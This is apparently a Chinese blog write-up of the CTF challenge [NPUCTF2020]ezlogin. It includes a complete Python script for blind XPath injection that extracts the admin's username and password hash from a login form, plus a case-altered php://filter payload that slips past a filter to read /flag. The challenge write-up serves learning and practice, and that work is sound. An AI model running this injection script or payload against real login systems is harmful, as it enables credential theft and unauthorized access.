BUUCTF--[NPUCTF2020]ezlogin

最新推荐文章于 2024-05-31 23:11:29 发布
最新推荐文章于 2024-05-31 23:11:29 发布
阅读量573 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119192413
版权

 进入页面后是一个登录页面

几番尝试后没啥发现,尝试抓包

 判断是一个Xpath数据,这里需要使用xpath注入
先学习一下Xpath注入
这里使用大佬的脚本进行探测

import requests
import re
import time

session = requests.session()
url = "http://391bfefa-8949-4535-8129-07c86723c6b9.node4.buuoj.cn"
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
head = {
    #'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36',
    'Content-Type': 'application/xml',
    #"Cookie":"UM_distinctid=1785326510411f-0b3fb285b5c49c-4c3f227c-144000-178532651052c9; session=b953d436-f0da-4e58-be79-22676707c609.K5TbTAnwLyhIU66duiTX1Usn1D8; PHPSESSID=dd258b30ebc3b42c352a92ed98092b1c"
        }

find = re.compile(r'<input type="hidden" id="token" value="(.*?)" />',re.S)
result = ""
#猜测根节点名称
payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"
#猜测子节点名称
payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"
#猜测accounts的节点
payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"
#猜测user节点
payload_4 ="<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"
#跑用户名和密码
payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"
payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"

def get_token():     #获取token的函数
    resp = session.get(url=url)  #如果在这里用headers会得到超时的界面
    token = find.findall(resp.text)[0]
    #print(token)
    return token

for x in range(1,100):
    for char in chars:
        time.sleep(0.3)
        token = get_token()
        playload = payload_username.format(x, char, token)   #根据上面的playload来改
        #print(playload)
        resp = session.post(url=url,headers=head, data=playload)
        #print(resp.text)
        if "非法操作" in resp.text:
            result += char
            print(result)
            break
    if "用户名或密码错误" in resp.text:
        break

print(result)

 得到帐号为adm1n,密码为cf7414b5bdb2e65ee43083f4ddbc4d9f,MD5解密后为gtfly123

成功登录,当我们点Blog选项时可以发现有一个页面在极短的时间内跳转了,bp抓包看看

 可以看到welcome!下面有一段字母,使用base64解码为 flag is in /flag

直接访问发现被拦截了

使用伪协议来读取flag
php://filter/read=convert.base64-encode/resource=/flag

还是被拦截了,使用大小写绕过
?file=pHp://filter/convert.bASe64-encode/resource=/flag
访问后还是出现上面那种情况,出现了跳转,直接查看源代码即可看到

base64解密即可得到flag

Uzero.
关注
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
[NPUCTF2020]ezlogin
fmyyy1的博客
05-11 504
XPATH注入学习 一道xpath注入题,又是陌生的知识,学习一下。
[NPUCTF2020]ezlogin-XPATH注入学习
cjdgg的博客
05-13 655
[NPUCTF2020]ezlogin-XPATH注入学习 这题进入后就是一个简单的登录页面,拿御剑没有扫出别的东西,简单的sql注入试了一下也没有任何回显,爆破的话他这里有一个token一直在刷新,所以会有点麻烦,应该也不会拿爆破来考别人 后来看了别人的WP才知道是XPATH注入,以前没遇到过,也不是很了解,于是去找了篇相关文章顺带学习一下 这些是XPATH的一些基础语法和介绍 从这里可以看到它和sql注入还是很相像的,只不过XPATH注入好像没有注释符把后面的都注释掉,所以需要我们去构造闭合后面的
Web-11(41-44)-BUUCTF平台
~airrudder~
07-09 893
本篇内容 [NPUCTF2020]ReadlezPHP [NPUCTF2020]ezlogin [NPUCTF2020]ezinclude [NPUCTF2020]验证???? [NPUCTF2020]web???? [NPUCTF2020]EzShiro 上一篇 | 目录 | 下一篇 [NPUCTF2020]ReadlezPHP 直接加view-source:查看源代码: <?php #err...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
BUUCTF [NPUCTF2020]芜湖
weixin_53349587的博客
01-09 3048
这道题是一个base64隐写,我们要先提取出所有的base加密值,然后用base隐写提取的函数,把flag提取出来,就得到了flag。 1.提取base值 本来想着用ida动调一下,应该可以提出来,结果值在堆上面,ida动调只能看到一半的base值,一点用也没有,没办法,就用pwn的pwndbg查看堆: 接下来就一直单步s运行下去,一个一个把base值提取出来,得到最终的base值: "55y85YmN6YeN5aSN55qE6aOO5pmvLG==", "5riQ5riQ5qih57OK5L
BUUCTF:签到
Starbright.的博客
10-26 1592
不会还真有人看不到flag吧
BUUCTF MISC 签到
moyikong的博客
01-06 364
这个题简直是“cv工程师”的最爱呀 手动复制flag即可
[NPUCTF2020]ezlogin (xpath盲注)
记录学习,一起进步
03-26 884
[NPUCTF2020]ezlogin (xpath盲注)
青少年CTF练习平台 EzLogin exp
最新发布
2301_80395418的博客
05-31 336
【代码】青少年CTF练习平台 EzLogin exp。
[NPUCTF2020]ezlogin xPATH注入
qq_54929891的博客
07-01 451
xPATH
[NPUCTF2020]这是什么觅-BUUCTF
yuqie的博客
06-12 466
底下有行字:F1 W1 S22 S21 T12 S11 W1 S13,第一个字母正好是星期的首字符,后面的数字有一位也有两位,一位的 好理解,就是对应星期下面的第几个数字,比如F1就代表FRI(星期五)下的第一个日期就是 3;出现两位数字的是因为星期首字符有重复比如星期二和星期四首字符都是T,那T1,T2按顺序就是星期二,星期四,全部替换后的数字是:3 1 12 5 14 4 1 18,对应26个英文字母的就是calendar。flag就是flag{calenar}!添加压缩包后缀并解压得到一张图片。
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决注入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便注这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL注入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便注是一道涉及注入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值